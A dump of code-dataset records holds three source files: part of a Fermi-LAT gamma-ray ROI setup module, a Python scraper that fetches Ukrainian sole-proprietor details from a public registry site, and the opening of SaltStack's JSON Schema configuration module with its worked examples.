dataspec\n self.dataset.CALDBManager = pycaldb.CALDBManager(irf = self.analysis_kw.get('irf',None),\n psf_irf = self.analysis_kw.get('psf_irf',None),\n CALDB = self.analysis_kw.get('CALDB',None),\n custom_irf_dir=self.analysis_kw.get(\"irfdir\",None))\n self.data_manager = self.dataset(self.data_interval) #need to save a reference to avoid a segfault\n self.exposure = pointspec2.ExposureManager(self.data_manager,self.dataset.CALDBManager)\n\n self.exposure.correction = [lambda e: 1,lambda e : 1] #TODO\n \n else: # not a DataSet or dict\n if dataspec is None:\n if not self.quiet: 'dataspec is None: loading datadict from skymodel.config'; sys.stdout.flush()\n datadict = self.skymodel.config['datadict']\n if type(datadict)==types.StringType: datadict=eval(datadict)\n if isinstance(datadict, dataman.DataSet): \n interval = self.skymodel.config.get('interval', None)\n if interval is None: interval = self.skymodel.config.get('data_interval', None)\n assert interval is not None, 'did not find interval or data_interval in skymodel.config'\n dset = datadict[interval]\n assert hasattr(dset, 'binfile'), 'Not a DataSet? %s' % dataset\n datadict = dict(dataname=dset)\n else:\n assert type(datadict)==types.DictType, 'expected a dict'\n elif isinstance(dataspec, dict):\n # a dictionary\n datadict = dataspec\n else:\n if not self.quiet: 'looking up dataspec %s' % dataspec\n datadict = dict(dataname=dataspec)\\\n if type(dataspec)!=types.DictType else dataspec\n if not self.quiet: '\\tdatadict: ', datadict\n if True: #self.analysis_kw.get('irf',None) is None:\n t = self.__dict__['irf']\n if t[0] in ('\"',\"'\"): t = eval(t)\n self.analysis_kw['irf'] = t\n if not self.quiet: '\\tirf:\\t%s' % self.analysis_kw['irf'] ; sys.stdout.flush()\n #datadict = dict(dataname=dataspec, ) \\\n # if type(dataspec)!=types.DictType else dataspec\n exposure_correction=datadict.pop('exposure_correction', None) \n self.dataset = dataset.DataSet(datadict['dataname'], interval=datadict.get('interval',None),\n nocreate = self.nocreate,\n **self.analysis_kw)\n if not self.quiet: self.dataset\n self.exposure = ExposureManager(self.dataset, exposure_correction=exposure_correction)\n \n if 'CUSTOM_IRF_DIR' not in os.environ and os.path.exists(os.path.expandvars('$FERMI/custom_irfs')):\n os.environ['CUSTOM_IRF_DIR'] = os.path.expandvars('$FERMI/custom_irfs')\n self.psf = pypsf.CALDBPsf(self.dataset.CALDBManager)\n \n convolution.AnalyticConvolution.set_points(self.convolve_kw['num_points'])\n convolution.ExtendedSourceConvolution.set_pixelsize(self.convolve_kw['pixelsize'])\n\n def __str__(self):\n s = '%s configuration:\\n'% self.__class__.__name__\n show = \"\"\"analysis_kw selector\"\"\".split()\n for key in show:\n s += '\\t%-20s: %s\\n' %(key,\n self.__dict__[key] if key in self.__dict__.keys() else 'not in self.__dict__!')\n return s\n\n def _diffuse_sources(self, src_sel):\n \"\"\" return the diffuse, global and extended sources\n \"\"\"\n skydir = src_sel.skydir()\n assert skydir is not None, 'should use the ROI skydir'\n # get all diffuse models appropriate for this ROI\n globals, extended = self.skymodel.get_diffuse_sources(src_sel)\n\n try:\n if hasattr(self,'data_manager'):\n bpd = self.data_manager.dataspec.binsperdec\n else:\n bpd = self.dataset.binsperdec\n global_models = [diffuse.mapper(self.psf, self.exposure, skydir, \n source, binsperdec = bpd, quiet=self.quiet) for source in globals]\n except Exception as msg:\n print (self.dataset, msg)\n raise\n\n def extended_mapper( source):\n if not self.quiet:\n if not 
self.quiet: 'constructing extended model for \"%s\", spatial model: %s' \\\n %(source, source.spatial_model.__class__.__name__)\n return roi_extended.ROIExtendedModel.factory(self,source,skydir)\n extended_models = map(extended_mapper, extended)\n return global_models, extended_models\n\n def _local_sources(self, src_sel):\n \"\"\" return the local sources with significant overlap with the ROI\n \"\"\"\n ps = self.skymodel.get_point_sources(src_sel)\n return np.asarray(ps)\n\n def roi(self, *pars, **kwargs):\n \"\"\" return an object based on the selector, with attributes for creating roi analysis:\n list of ROIBand objects\n list of models: point sources and diffuse\n pars, kwargs : pass to the selector\n \"\"\"\n roi_kw = kwargs.pop('roi_kw',dict())\n # allow parameter to be a name or a direction\n sel = pars[0]\n source_name=None\n if type(sel)==types.IntType:\n index = int(sel) # needs to be int if int type\n elif type(sel)==skymaps.SkyDir:\n index = self.skymodel.hpindex(sel)\n elif type(sel)==types.StringType:\n index = self.skymodel.hpindex(self.skymodel.find_source(sel).skydir)\n source_name=sel\n elif type(sel)==tuple and len(sel)==2: # interpret a tuple of length 2 as (ra,dec)\n index = self.skymodel.hpindex(skymaps.SkyDir(*sel))\n else:\n raise Exception( 'factory argument \"%s\" not recognized.' %sel)\n ## preselect the given source after setting up the ROI\n ## (not implemented here)\n #\n src_sel = self.selector(index, **kwargs)\n\n class ROIdef(object):\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n def __str__(self):\n return 'ROIdef for %s' %self.name\n skydir = src_sel.skydir() \n global_sources, extended_sources = self._diffuse_sources(src_sel)\n if isinstance(self.dataset,dataman.DataSet):\n bandsel = BandSelector(self.data_manager,\n self.psf,\n self.exposure,\n skydir)\n bands = bandsel(minROI = self.analysis_kw['minROI'],\n maxROI = self.analysis_kw['maxROI'],\n emin = self.analysis_kw['emin'],\n emax = self.analysis_kw['emax'])\n else:\n bands = self.dataset(self.psf,self.exposure,skydir)\n \n ## setup galactic diffuse correction and/or counts to pass into ROI generation\n #if self.galactic_correction is not None:\n # # look up the diffuse correction factors for this ROI, by name\n # self.exposure.dcorr = self.dcorr.ix[src_sel.name()].values\n\n return ROIdef( name=src_sel.name() ,\n roi_dir=skydir, \n bands=bands,\n global_sources=global_sources,\n extended_sources = extended_sources,\n point_sources=self._local_sources(src_sel), \n exposure=self.exposure,\n **roi_kw)\n \n def __call__(self, *pars, **kwargs):\n \"\"\" alias for roi() \"\"\"\n return self.roi(*pars, **kwargs)\n \n def reload_model(self):\n \"\"\" Reload the sources in the model \"\"\"\n self.skymodel._load_sources()\n\nclass BandSelector(object):\n \"\"\"Class to handle selection of bands with new data management code.\n \n Should be moved somewhere more sensible.\"\"\"\n\n def __init__(self,data_manager,psf,exposure,roi_dir):\n class SA(object):\n def __init__(self,**kw):self.__dict__.update(kw)\n #make sure exposure is the right kind of ExposureManager and that\n #data_manager is the same one use for the exposure\n assert(hasattr(exposure,'data_manager'))\n data_manager.dataspec.check_consistency(exposure.data_manager.dataspec)\n self.sa = SA(psf=psf,exposure=exposure)\n self.data_manager = data_manager\n self.roi_dir = roi_dir\n \n def __call__(self,minROI=7,maxROI=7,emin=100,emax=1e6,band_kw=dict()):\n self.sa.minROI = minROI\n self.sa.maxROI = maxROI\n bands = []\n for i,band 
in enumerate(self.data_manager.bpd):\n if (band.emin() + 1) >= emin and (band.emax() - 1) < emax:\n bands.append(roi_bands.ROIBand(band, self.sa, self.roi_dir,**band_kw))\n return np.asarray(bands)\n\n \n\ndef main(modeldir='3years/uw10', skymodel_kw={}):\n rf = ROIfactory(modeldir, **skymodel_kw)\n return rf\n","repo_name":"fermi-lat/pointlike","sub_path":"python/uw/like2/roisetup.py","file_name":"roisetup.py","file_ext":"py","file_size_in_byte":16892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5335520139","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom contract.services.director_name import short_director_name\n\n\ndef get_fop_info(code: str) -> dict:\n url = f\"https://clarity-project.info/edr/{code}\"\n response = requests.get(url)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, \"lxml\")\n main_div = soup.find(\"div\", class_=\"entity-content\").find_all(\"td\")\n raw_short_name = \" \".join(main_div[3].text.replace('\"', \"«\").split())\n short_name = raw_short_name[:-1] + \"»\"\n full_name = short_name.replace(\"ФОП\", \"ФІЗИЧНА ОСОБА-ПІДПРИЄМЕЦЬ\")\n code_company = main_div[1].text.lstrip()\n address = \" \".join(\n main_div[7].find(\"div\").text.replace(\"Запис в ЄДР:\", \"\").split()[1:]\n )\n director = main_div[11].find(\"div\").find(\"a\").text.lstrip()\n final_data = dict(\n {\n \"short_name\": short_name,\n \"code_company\": code_company,\n \"director\": director,\n \"short_dir_name\": short_director_name(director),\n \"full_name\": full_name,\n \"address\": address,\n }\n )\n return final_data\n else:\n return {}\n","repo_name":"ruslan-kornich/contract_creator","sub_path":"contract/services/get_fop_details.py","file_name":"get_fop_details.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12850097074","text":"\"\"\"\n :codeauthor: Pedro Algarvio (pedro@algarvio.me)\n :codeauthor: Alexandru Bleotu (alexandru.bleotu@morganstanley.com)\n\n\n salt.utils.schema\n ~~~~~~~~~~~~~~~~~\n\n Object Oriented Configuration - JSON Schema compatible generator\n\n This code was inspired by `jsl`__, \"A Python DSL for describing JSON\n schemas\".\n\n .. __: https://jsl.readthedocs.io/\n\n\n A configuration document or configuration document section is defined using\n the py:class:`Schema`, the configuration items are defined by any of the\n subclasses of py:class:`BaseSchemaItem` as attributes of a subclass of\n py:class:`Schema` class.\n\n A more complex configuration document (containing a defininitions section)\n is defined using the py:class:`DefinitionsSchema`. This type of\n schema supports having complex configuration items as attributes (defined\n extending the py:class:`ComplexSchemaItem`). These items have other\n configuration items (complex or not) as attributes, allowing to verify\n more complex JSON data structures\n\n As an example:\n\n .. code-block:: python\n\n class HostConfig(Schema):\n title = 'Host Configuration'\n description = 'This is the host configuration'\n\n host = StringItem(\n 'Host',\n 'The looong host description',\n default=None,\n minimum=1\n )\n\n port = NumberItem(\n description='The port number',\n default=80,\n required=False,\n minimum=0,\n inclusiveMinimum=False,\n maximum=65535\n )\n\n The serialized version of the above configuration definition is:\n\n .. 
code-block:: python\n\n >>> print(HostConfig.serialize())\n OrderedDict([\n ('$schema', 'http://json-schema.org/draft-04/schema#'),\n ('title', 'Host Configuration'),\n ('description', 'This is the host configuration'),\n ('type', 'object'),\n ('properties', OrderedDict([\n ('host', {'minimum': 1,\n 'type': 'string',\n 'description': 'The looong host description',\n 'title': 'Host'}),\n ('port', {'description': 'The port number',\n 'default': 80,\n 'inclusiveMinimum': False,\n 'maximum': 65535,\n 'minimum': 0,\n 'type': 'number'})\n ])),\n ('required', ['host']),\n ('x-ordering', ['host', 'port']),\n ('additionalProperties', True)]\n )\n >>> print(salt.utils.json.dumps(HostConfig.serialize(), indent=2))\n {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"Host Configuration\",\n \"description\": \"This is the host configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The looong host description\",\n \"title\": \"Host\"\n },\n \"port\": {\n \"description\": \"The port number\",\n \"default\": 80,\n \"inclusiveMinimum\": false,\n \"maximum\": 65535,\n \"minimum\": 0,\n \"type\": \"number\"\n }\n },\n \"required\": [\n \"host\"\n ],\n \"x-ordering\": [\n \"host\",\n \"port\"\n ],\n \"additionalProperties\": false\n }\n\n\n The serialized version of the configuration block can be used to validate a\n configuration dictionary using the `python jsonschema library`__.\n\n .. __: https://pypi.python.org/pypi/jsonschema\n\n .. code-block:: python\n\n >>> import jsonschema\n >>> jsonschema.validate({'host': 'localhost', 'port': 80}, HostConfig.serialize())\n >>> jsonschema.validate({'host': 'localhost', 'port': -1}, HostConfig.serialize())\n Traceback (most recent call last):\n File \"\", line 1, in \n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 478, in validate\n cls(schema, *args, **kwargs).validate(instance)\n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 123, in validate\n raise error\n jsonschema.exceptions.ValidationError: -1 is less than the minimum of 0\n\n Failed validating 'minimum' in schema['properties']['port']:\n {'default': 80,\n 'description': 'The port number',\n 'inclusiveMinimum': False,\n 'maximum': 65535,\n 'minimum': 0,\n 'type': 'number'}\n\n On instance['port']:\n -1\n >>>\n\n\n A configuration document can even be split into configuration sections. Let's reuse the above\n ``HostConfig`` class and include it in a configuration block:\n\n .. code-block:: python\n\n class LoggingConfig(Schema):\n title = 'Logging Configuration'\n description = 'This is the logging configuration'\n\n log_level = StringItem(\n 'Logging Level',\n 'The logging level',\n default='debug',\n minimum=1\n )\n\n class MyConfig(Schema):\n\n title = 'My Config'\n description = 'This my configuration'\n\n hostconfig = HostConfig()\n logconfig = LoggingConfig()\n\n\n The JSON Schema string version of the above is:\n\n .. 
code-block:: python\n\n >>> print salt.utils.json.dumps(MyConfig.serialize(), indent=4)\n {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"My Config\",\n \"description\": \"This my configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"hostconfig\": {\n \"id\": \"https://non-existing.saltstack.com/schemas/hostconfig.json#\",\n \"title\": \"Host Configuration\",\n \"description\": \"This is the host configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The looong host description\",\n \"title\": \"Host\"\n },\n \"port\": {\n \"description\": \"The port number\",\n \"default\": 80,\n \"inclusiveMinimum\": false,\n \"maximum\": 65535,\n \"minimum\": 0,\n \"type\": \"number\"\n }\n },\n \"required\": [\n \"host\"\n ],\n \"x-ordering\": [\n \"host\",\n \"port\"\n ],\n \"additionalProperties\": false\n },\n \"logconfig\": {\n \"id\": \"https://non-existing.saltstack.com/schemas/logconfig.json#\",\n \"title\": \"Logging Configuration\",\n \"description\": \"This is the logging configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"log_level\": {\n \"default\": \"debug\",\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The logging level\",\n \"title\": \"Logging Level\"\n }\n },\n \"required\": [\n \"log_level\"\n ],\n \"x-ordering\": [\n \"log_level\"\n ],\n \"additionalProperties\": false\n }\n },\n \"additionalProperties\": false\n }\n\n >>> import jsonschema\n >>> jsonschema.validate(\n {'hostconfig': {'host': 'localhost', 'port': 80},\n 'logconfig': {'log_level': 'debug'}},\n MyConfig.serialize())\n >>> jsonschema.validate(\n {'hostconfig': {'host': 'localhost', 'port': -1},\n 'logconfig': {'log_level': 'debug'}},\n MyConfig.serialize())\n Traceback (most recent call last):\n File \"\", line 1, in \n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 478, in validate\n cls(schema, *args, **kwargs).validate(instance)\n File \"/usr/lib/python2.7/site-packages/jsonschema/validators.py\", line 123, in validate\n raise error\n jsonschema.exceptions.ValidationError: -1 is less than the minimum of 0\n\n Failed validating 'minimum' in schema['properties']['hostconfig']['properties']['port']:\n {'default': 80,\n 'description': 'The port number',\n 'inclusiveMinimum': False,\n 'maximum': 65535,\n 'minimum': 0,\n 'type': 'number'}\n\n On instance['hostconfig']['port']:\n -1\n >>>\n\n If however, you just want to use the configuration blocks for readability\n and do not desire the nested dictionaries serialization, you can pass\n ``flatten=True`` when defining a configuration section as a configuration\n subclass attribute:\n\n .. code-block:: python\n\n class MyConfig(Schema):\n\n title = 'My Config'\n description = 'This my configuration'\n\n hostconfig = HostConfig(flatten=True)\n logconfig = LoggingConfig(flatten=True)\n\n\n The JSON Schema string version of the above is:\n\n .. 
code-block:: python\n\n >>> print(salt.utils.json.dumps(MyConfig, indent=4))\n {\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"title\": \"My Config\",\n \"description\": \"This my configuration\",\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The looong host description\",\n \"title\": \"Host\"\n },\n \"port\": {\n \"description\": \"The port number\",\n \"default\": 80,\n \"inclusiveMinimum\": false,\n \"maximum\": 65535,\n \"minimum\": 0,\n \"type\": \"number\"\n },\n \"log_level\": {\n \"default\": \"debug\",\n \"minimum\": 1,\n \"type\": \"string\",\n \"description\": \"The logging level\",\n \"title\": \"Logging Level\"\n }\n },\n \"x-ordering\": [\n \"host\",\n \"port\",\n \"log_level\"\n ],\n \"additionalProperties\": false\n }\n\"\"\"\n\nimport inspect\nimport textwrap\n\nimport salt.utils.args\n\n# import salt.utils.yaml\nfrom salt.utils.odict import OrderedDict\n\nBASE_SCHEMA_URL = \"https://non-existing.saltstack.com/schemas\"\nRENDER_COMMENT_YAML_MAX_LINE_LENGTH = 80\n\n\nclass NullSentinel:\n \"\"\"\n A class which instance represents a null value.\n Allows specifying fields with a default value of null.\n \"\"\"\n\n def __bool__(self):\n return False\n\n __nonzero__ = __bool__\n\n\nNull = NullSentinel()\n\"\"\"\nA special value that can be used to set the default value\nof a field to null.\n\"\"\"\n\n\n# make sure nobody creates another Null value\ndef _failing_new(*args, **kwargs):\n raise TypeError(\"Can't create another NullSentinel instance\")\n\n\nNullSentinel.__new__ = staticmethod(_failing_new)\ndel _failing_new\n\n\nclass SchemaMeta(type):\n @classmethod\n def __prepare__(mcs, name, bases):\n return OrderedDict()\n\n def __new__(mcs, name, bases, attrs):\n # Mark the instance as a configuration document/section\n attrs[\"__config__\"] = True\n attrs[\"__flatten__\"] = False\n attrs[\"__config_name__\"] = None\n\n # Let's record the configuration items/sections\n items = {}\n sections = {}\n order = []\n # items from parent classes\n for base in reversed(bases):\n if hasattr(base, \"_items\"):\n items.update(base._items)\n if hasattr(base, \"_sections\"):\n sections.update(base._sections)\n if hasattr(base, \"_order\"):\n order.extend(base._order)\n\n # Iterate through attrs to discover items/config sections\n for key, value in attrs.items():\n entry_name = None\n if not hasattr(value, \"__item__\") and not hasattr(value, \"__config__\"):\n continue\n if hasattr(value, \"__item__\"):\n # the value is an item instance\n if hasattr(value, \"title\") and value.title is None:\n # It's an item instance without a title, make the title\n # its name\n value.title = key\n entry_name = value.__item_name__ or key\n items[entry_name] = value\n if hasattr(value, \"__config__\"):\n entry_name = value.__config_name__ or key\n sections[entry_name] = value\n order.append(entry_name)\n\n attrs[\"_order\"] = order\n attrs[\"_items\"] = items\n attrs[\"_sections\"] = sections\n return type.__new__(mcs, name, bases, attrs)\n\n def __call__(cls, flatten=False, allow_additional_items=False, **kwargs):\n instance = object.__new__(cls)\n instance.__config_name__ = kwargs.pop(\"name\", None)\n if flatten is True:\n # This configuration block is to be treated as a part of the\n # configuration for which it was defined as an attribute, not as\n # its own sub configuration\n instance.__flatten__ = True\n if allow_additional_items is True:\n # The configuration block only accepts the configuration items\n # 
which are defined on the class. On additional items, validation\n # with jsonschema will fail\n instance.__allow_additional_items__ = True\n instance.__init__(**kwargs)\n return instance\n\n\nclass BaseSchemaItemMeta(type):\n \"\"\"\n Config item metaclass to \"tag\" the class as a configuration item\n \"\"\"\n\n @classmethod\n def __prepare__(mcs, name, bases):\n return OrderedDict()\n\n def __new__(mcs, name, bases, attrs):\n # Register the class as an item class\n attrs[\"__item__\"] = True\n attrs[\"__item_name__\"] = None\n # Instantiate an empty list to store the config item attribute names\n attributes = []\n for base in reversed(bases):\n try:\n base_attributes = getattr(base, \"_attributes\", [])\n if base_attributes:\n attributes.extend(base_attributes)\n # Extend the attributes with the base argspec argument names\n # but skip \"self\"\n for argname in salt.utils.args.get_function_argspec(base.__init__).args:\n if argname == \"self\" or argname in attributes:\n continue\n if argname == \"name\":\n continue\n attributes.append(argname)\n except TypeError:\n # On the base object type, __init__ is just a wrapper which\n # triggers a TypeError when we're trying to find out its\n # argspec\n continue\n attrs[\"_attributes\"] = attributes\n return type.__new__(mcs, name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n # Create the instance class\n instance = object.__new__(cls)\n if args:\n raise RuntimeError(\n \"Please pass all arguments as named arguments. Un-named \"\n \"arguments are not supported\"\n )\n for key in kwargs.copy():\n # Store the kwarg keys as the instance attributes for the\n # serialization step\n if key == \"name\":\n # This is the item name to override the class attribute name\n instance.__item_name__ = kwargs.pop(key)\n continue\n if key not in instance._attributes:\n instance._attributes.append(key)\n # Init the class\n instance.__init__(*args, **kwargs)\n # Validate the instance after initialization\n for base in reversed(inspect.getmro(cls)):\n validate_attributes = getattr(base, \"__validate_attributes__\", None)\n if validate_attributes:\n if (\n instance.__validate_attributes__.__func__.__code__\n is not validate_attributes.__code__\n ):\n # The method was overridden, run base.__validate_attributes__ function\n base.__validate_attributes__(instance)\n # Finally, run the instance __validate_attributes__ function\n instance.__validate_attributes__()\n # Return the initialized class\n return instance\n\n\nclass Schema(metaclass=SchemaMeta):\n \"\"\"\n Configuration definition class\n \"\"\"\n\n # Define some class level attributes to make PyLint happier\n title = None\n description = None\n _items = _sections = _order = None\n __flatten__ = False\n __allow_additional_items__ = False\n\n @classmethod\n def serialize(cls, id_=None):\n # The order matters\n serialized = OrderedDict()\n if id_ is not None:\n # This is meant as a configuration section, sub json schema\n serialized[\"id\"] = \"{}/{}.json#\".format(BASE_SCHEMA_URL, id_)\n else:\n # Main configuration block, json schema\n serialized[\"$schema\"] = \"http://json-schema.org/draft-04/schema#\"\n if cls.title is not None:\n serialized[\"title\"] = cls.title\n if cls.description is not None:\n if cls.description == cls.__doc__:\n serialized[\"description\"] = textwrap.dedent(cls.description).strip()\n else:\n serialized[\"description\"] = cls.description\n\n required = []\n ordering = []\n serialized[\"type\"] = \"object\"\n properties = OrderedDict()\n cls.after_items_update = []\n for name in 
cls._order: # pylint: disable=E1133\n skip_order = False\n item_name = None\n if name in cls._sections: # pylint: disable=E1135\n section = cls._sections[name]\n serialized_section = section.serialize(\n None if section.__flatten__ is True else name\n )\n if section.__flatten__ is True:\n # Flatten the configuration section into the parent\n # configuration\n properties.update(serialized_section[\"properties\"])\n if \"x-ordering\" in serialized_section:\n ordering.extend(serialized_section[\"x-ordering\"])\n if \"required\" in serialized_section:\n required.extend(serialized_section[\"required\"])\n if hasattr(section, \"after_items_update\"):\n cls.after_items_update.extend(section.after_items_update)\n skip_order = True\n else:\n # Store it as a configuration section\n properties[name] = serialized_section\n\n if name in cls._items: # pylint: disable=E1135\n config = cls._items[name]\n item_name = config.__item_name__ or name\n # Handle the configuration items defined in the class instance\n if config.__flatten__ is True:\n serialized_config = config.serialize()\n cls.after_items_update.append(serialized_config)\n skip_order = True\n else:\n properties[item_name] = config.serialize()\n\n if config.required:\n # If it's a required item, add it to the required list\n required.append(item_name)\n\n if skip_order is False:\n # Store the order of the item\n if item_name is not None:\n if item_name not in ordering:\n ordering.append(item_name)\n else:\n if name not in ordering:\n ordering.append(name)\n\n if properties:\n serialized[\"properties\"] = properties\n\n # Update the serialized object with any items to include after properties.\n # Do not overwrite properties already existing in the serialized dict.\n if cls.after_items_update:\n after_items_update = {}\n for entry in cls.after_items_update:\n for name, data in entry.items():\n if name in after_items_update:\n if isinstance(after_items_update[name], list):\n after_items_update[name].extend(data)\n else:\n after_items_update[name] = data\n if after_items_update:\n after_items_update.update(serialized)\n serialized = after_items_update\n\n if required:\n # Only include required if not empty\n serialized[\"required\"] = required\n if ordering:\n # Only include ordering if not empty\n serialized[\"x-ordering\"] = ordering\n serialized[\"additionalProperties\"] = cls.__allow_additional_items__\n return serialized\n\n @classmethod\n def defaults(cls):\n serialized = cls.serialize()\n defaults = {}\n for name, details in serialized[\"properties\"].items():\n if \"default\" in details:\n defaults[name] = details[\"default\"]\n continue\n if \"properties\" in details:\n for sname, sdetails in details[\"properties\"].items():\n if \"default\" in sdetails:\n defaults.setdefault(name, {})[sname] = sdetails[\"default\"]\n continue\n return defaults\n\n @classmethod\n def as_requirements_item(cls):\n serialized_schema = cls.serialize()\n required = serialized_schema.get(\"required\", [])\n for name in serialized_schema[\"properties\"]:\n if name not in required:\n required.append(name)\n return RequirementsItem(requirements=required)\n\n # @classmethod\n # def render_as_rst(cls):\n # '''\n # Render the configuration block as a restructured text string\n # '''\n # # TODO: Implement RST rendering\n # raise NotImplementedError\n\n # @classmethod\n # def render_as_yaml(cls):\n # '''\n # Render the configuration block as a parseable YAML string including comments\n # '''\n # # TODO: Implement YAML rendering\n # raise NotImplementedError\n\n\nclass 
SchemaItem(metaclass=BaseSchemaItemMeta):\n \"\"\"\n Base configuration items class.\n\n All configurations must subclass it\n \"\"\"\n\n # Define some class level attributes to make PyLint happier\n __type__ = None\n __format__ = None\n _attributes = None\n __flatten__ = False\n\n __serialize_attr_aliases__ = None\n\n required = False\n\n def __init__(self, required=None, **extra):\n \"\"\"\n :param required: If the configuration item is required. Defaults to ``False``.\n \"\"\"\n if required is not None:\n self.required = required\n self.extra = extra\n\n def __validate_attributes__(self):\n \"\"\"\n Run any validation check you need the instance attributes.\n\n ATTENTION:\n\n Don't call the parent class when overriding this\n method because it will just duplicate the executions. This class'es\n metaclass will take care of that.\n \"\"\"\n if self.required not in (True, False):\n raise RuntimeError(\"'required' can only be True/False\")\n\n def _get_argname_value(self, argname):\n \"\"\"\n Return the argname value looking up on all possible attributes\n \"\"\"\n # Let's see if there's a private function to get the value\n argvalue = getattr(self, \"__get_{}__\".format(argname), None)\n if argvalue is not None and callable(argvalue):\n argvalue = argvalue() # pylint: disable=not-callable\n if argvalue is None:\n # Let's see if the value is defined as a public class variable\n argvalue = getattr(self, argname, None)\n if argvalue is None:\n # Let's see if it's defined as a private class variable\n argvalue = getattr(self, \"__{}__\".format(argname), None)\n if argvalue is None:\n # Let's look for it in the extra dictionary\n argvalue = self.extra.get(argname, None)\n return argvalue\n\n def serialize(self):\n \"\"\"\n Return a serializable form of the config instance\n \"\"\"\n raise NotImplementedError\n\n\nclass BaseSchemaItem(SchemaItem):\n \"\"\"\n Base configuration items class.\n\n All configurations must subclass it\n \"\"\"\n\n # Let's define description as a class attribute, this will allow a custom configuration\n # item to do something like:\n # class MyCustomConfig(StringItem):\n # '''\n # This is my custom config, blah, blah, blah\n # '''\n # description = __doc__\n #\n description = None\n # The same for all other base arguments\n title = None\n default = None\n enum = None\n enumNames = None\n\n def __init__(\n self,\n title=None,\n description=None,\n default=None,\n enum=None,\n enumNames=None,\n **kwargs\n ):\n \"\"\"\n :param required:\n If the configuration item is required. Defaults to ``False``.\n :param title:\n A short explanation about the purpose of the data described by this item.\n :param description:\n A detailed explanation about the purpose of the data described by this item.\n :param default:\n The default value for this configuration item. 
May be :data:`.Null` (a special value\n to set the default value to null).\n :param enum:\n A list(list, tuple, set) of valid choices.\n \"\"\"\n if title is not None:\n self.title = title\n if description is not None:\n self.description = description\n if default is not None:\n self.default = default\n if enum is not None:\n self.enum = enum\n if enumNames is not None:\n self.enumNames = enumNames\n super().__init__(**kwargs)\n\n def __validate_attributes__(self):\n if self.enum is not None:\n if not isinstance(self.enum, (list, tuple, set)):\n raise RuntimeError(\n \"Only the 'list', 'tuple' and 'set' python types can be used \"\n \"to define 'enum'\"\n )\n if not isinstance(self.enum, list):\n self.enum = list(self.enum)\n if self.enumNames is not None:\n if not isinstance(self.enumNames, (list, tuple, set)):\n raise RuntimeError(\n \"Only the 'list', 'tuple' and 'set' python types can be used \"\n \"to define 'enumNames'\"\n )\n if len(self.enum) != len(self.enumNames):\n raise RuntimeError(\n \"The size of 'enumNames' must match the size of 'enum'\"\n )\n if not isinstance(self.enumNames, list):\n self.enumNames = list(self.enumNames)\n\n def serialize(self):\n \"\"\"\n Return a serializable form of the config instance\n \"\"\"\n serialized = {\"type\": self.__type__}\n for argname in self._attributes:\n if argname == \"required\":\n # This is handled elsewhere\n continue\n argvalue = self._get_argname_value(argname)\n if argvalue is not None:\n if argvalue is Null:\n argvalue = None\n # None values are not meant to be included in the\n # serialization, since this is not None...\n if (\n self.__serialize_attr_aliases__\n and argname in self.__serialize_attr_aliases__\n ):\n argname = self.__serialize_attr_aliases__[argname]\n serialized[argname] = argvalue\n return serialized\n\n def __get_description__(self):\n if self.description is not None:\n if self.description == self.__doc__:\n return textwrap.dedent(self.description).strip()\n return self.description\n\n # def render_as_rst(self, name):\n # '''\n # Render the configuration item as a restructured text string\n # '''\n # # TODO: Implement YAML rendering\n # raise NotImplementedError\n\n # def render_as_yaml(self, name):\n # '''\n # Render the configuration item as a parseable YAML string including comments\n # '''\n # # TODO: Include the item rules in the output, minimum, maximum, etc...\n # output = '# ----- '\n # output += self.title\n # output += ' '\n # output += '-' * (RENDER_COMMENT_YAML_MAX_LINE_LENGTH - 7 - len(self.title) - 2)\n # output += '>\\n'\n # if self.description:\n # output += '\\n'.join(textwrap.wrap(self.description,\n # width=RENDER_COMMENT_YAML_MAX_LINE_LENGTH,\n # initial_indent='# '))\n # output += '\\n'\n # yamled_default_value = salt.utils.yaml.safe_dump(self.default, default_flow_style=False).split('\\n...', 1)[0]\n # output += '# Default: {0}\\n'.format(yamled_default_value)\n # output += '#{0}: {1}\\n'.format(name, yamled_default_value)\n # output += '# <---- '\n # output += self.title\n # output += ' '\n # output += '-' * (RENDER_COMMENT_YAML_MAX_LINE_LENGTH - 7 - len(self.title) - 1)\n # return output + '\\n'\n\n\nclass NullItem(BaseSchemaItem):\n\n __type__ = \"null\"\n\n\nclass BooleanItem(BaseSchemaItem):\n __type__ = \"boolean\"\n\n\nclass StringItem(BaseSchemaItem):\n \"\"\"\n A string configuration field\n \"\"\"\n\n __type__ = \"string\"\n\n __serialize_attr_aliases__ = {\"min_length\": \"minLength\", \"max_length\": \"maxLength\"}\n\n format = None\n pattern = None\n min_length = None\n 
